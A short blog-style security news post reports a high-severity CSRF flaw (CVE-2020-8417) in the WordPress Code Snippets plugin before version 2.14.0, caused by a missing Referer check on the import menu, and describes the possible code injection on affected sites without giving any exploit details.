Over 200k wordpress sites possibly exposed to hack due to code snippets flaw

More than 200k wordpress sites are exposed to attacks due to a high severity CSRF (cross site request forgery) bug in code snippets plugin.

The plugin allows users to execute code without adding custom snippets to their theme’s function.php file.

Code snippets also implements a graphical interface, similar to the plugin menu, for managing snippets.

snippets can be activated and deactivated just like another plugins.

This CSRF vulnerability could be exploited by attackers to forge a request on behalf of an administrator and inject code on a vulnerable site, Possibily allowing remotely execute arbitrary code on wordpress installs running vulnerable code snippets installation.

This vulnerability can be tracked using CVE-2020-8417

NVD Description about the same vulnerability is following

The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.

thanks for reading post hope you like

Leave a Comment

Your email address will not be published. Required fields are marked *